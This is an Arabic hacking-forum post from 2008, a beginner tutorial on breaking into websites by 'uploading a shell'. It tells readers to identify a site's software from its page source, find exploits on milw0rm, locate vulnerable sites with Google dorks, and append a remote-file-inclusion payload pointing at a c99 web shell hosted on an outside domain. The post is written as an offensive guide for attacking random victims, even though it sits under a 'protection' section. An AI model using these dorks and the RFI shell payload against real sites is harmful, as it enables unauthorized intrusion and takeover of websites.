منتدي الغندورللبرامج
هل تريد التفاعل مع هذه المساهمة؟ كل ما عليك هو إنشاء حساب جديد ببضع خطوات أو تسجيل الدخول للمتابعة.

منتدي الغندورللبرامج

مركز البرامج و الحمايه والتصميمات والفتو شوب والهكر(هذا المنتدي منظومه عربيه للاختراقات العالميه)
 
دخولالتسجيلأحدث الصورالبوابةالرئيسية

منتدي الغندورللبرامج :: قسم الحمايه من الهكر :: منتدي جديد الثغرات وطرق الحمايه منها
 

 تبي تخترق بالشل تعال

اذهب الى الأسفل 
كاتب الموضوعرسالة
الدكتور
رئيس مجلس الاداره
رئيس مجلس الاداره
الدكتور


عدد الرسائل : 368
الدوله : تبي تخترق بالشل تعال Egyption
المهنه : تبي تخترق بالشل تعال Profes10
هوايتك : تبي تخترق بالشل تعال Sports10
نقاط العضو :
تبي تخترق بالشل تعال Left_bar_bleue100 / 100100 / 100تبي تخترق بالشل تعال Right_bar_bleue

وسام : تبي تخترق بالشل تعال Mdir2008
تاريخ التسجيل : 16/01/2008

تبي تخترق بالشل تعال Empty
مُساهمةموضوع: تبي تخترق بالشل تعال   تبي تخترق بالشل تعال Icon_minitimeالإثنين مايو 19, 2008 5:36 pm
اليوم راح اشرح للاخوان والاخوات الي يرسلووون لي كيفية ربط الشل للاستغلال ....
===========================================
اليوم موضوعنا مثل ما انت العنووووووووان
يله نبدا

بسم الله الرحمن الرحيم :

السلام عليكم اما بعد
اليوم رايح اشرحلكم بساطت رفع شيل على موقع وكيف يتم ذالك طبعا نحن دايم نسمع اختراق عن طريق ثغره رفع شيل صفحت اندكس موجوده على احد المواقع لكن كيف يتم كل هذا .
انته يالمبتداء دايم تروح تدور في المنتديات الهكرز تحاول تتعلم تخترق موقع وتعتقد انه اكتشاف الثغرات شي صعب بس اقولك انه شي سهل الحين رايح نتعلم الاختراق العشوائي والأستهداف.
في عندنا طريقه سهله لختراق المواقع نفترض انك تريد تخترق هذا الموقع www.xxx.com
بس ويش تسوي على شان تعرف ثغرات بسرعه اقولك انه سهل جدا شوف فوق عندك في المتصفح بتلاقي هذي الايقونات file edit view وايقونات ثانيه انته اضغط على view بعدين اختار source رايح يطلعلك كلام بلانجليزي هذا كود صفحت الموقع ويش نريد منه الي نريده سكربت الموقع او اي سكربت يستخدمه الموقع مثل سكربت الستايل
شوف هذي العباره في الكود
<****** type="text/java******">
<!--
// Main vBulletin Java****** Initialization
vBulletin_init();
//-->
</******>
تقول ويش اسوي فيه ؟
ويش تسوي فيه طبعا نحن نريد سكربت يستخدمه الموقع ناخذ هذا مثلا من العباره vBulletin Java****** Initialization
ناخذه ونطير على هذا الموقع وهوه واحد من مواقع السكيرتي
http://www.milw0rm.com
بعد ماندخله نروح الى قائمة البحث ونحط اسم السكربت ورايح تطلع لنا اخر الثغرات.
بس اول شي لازم نعرف كيف نستخدم هذا الموقع في الأطار الي نريده نبدا بلأختراق العشوائي.
ادخل هنا طبعا في الموقع [ web apps ]
طبعا رايح تطلع لنا كثير ثغرات مثلا ناخذ هذي

http://www.milw0rm.com/exploits/4221

طبعا نحن الي يهمنى الاستغلال وكود البحث في جوجل
شوف هنا
هذا أكواد البحث في جوجل
dork:inurl:index.php%"Submit%Articles"%"Member%Log in"%"Top%Authors"
dork:inurl:index.php?pagedb=rss
هذي الكلمه drok هي تعني كود البحث

اما هنا
expl:index.php?page=****l?

فهذا الاستغلال expl تعني استغلال الثغره
الحين نجي للاختراق افتح جوجل ونختار كود البحث هذا
inurl:index.php?pagedb=rss
رايح تطلع لنا مواقع كثيره اختر واحد
بعدين حط الاستغلال الي هوه
index.php?page=****l؟
كلمة شيل تعني رابط الشيل الي تستخدمه
مثلا هذا رابط تشيل
http://casavie.net/hack/c99.txt?
جيب موقع الضحيه الي هوه
www.xxx.com
وحط وراه الاتسغلال يعني يصير كذا
http://www.xxx.com\index.php?=http:/.../hack/c99.txt?
طبعلا لاتنسى التبي تخترق بالشل تعال Questionmark بعد رابط الشيل وطبعا كذا يتم رفع شيل عن طريقاستغلال ثغره .
الرجوع الى أعلى الصفحة اذهب الى الأسفل
https://elgandour.ahlamontada.com
 
تبي تخترق بالشل تعال
الرجوع الى أعلى الصفحة 
صفحة 1 من اصل 1
 مواضيع مماثلة
-

صلاحيات هذا المنتدى:لاتستطيع الرد على المواضيع في هذا المنتدى
منتدي الغندورللبرامج :: قسم الحمايه من الهكر :: منتدي جديد الثغرات وطرق الحمايه منها-
انتقل الى: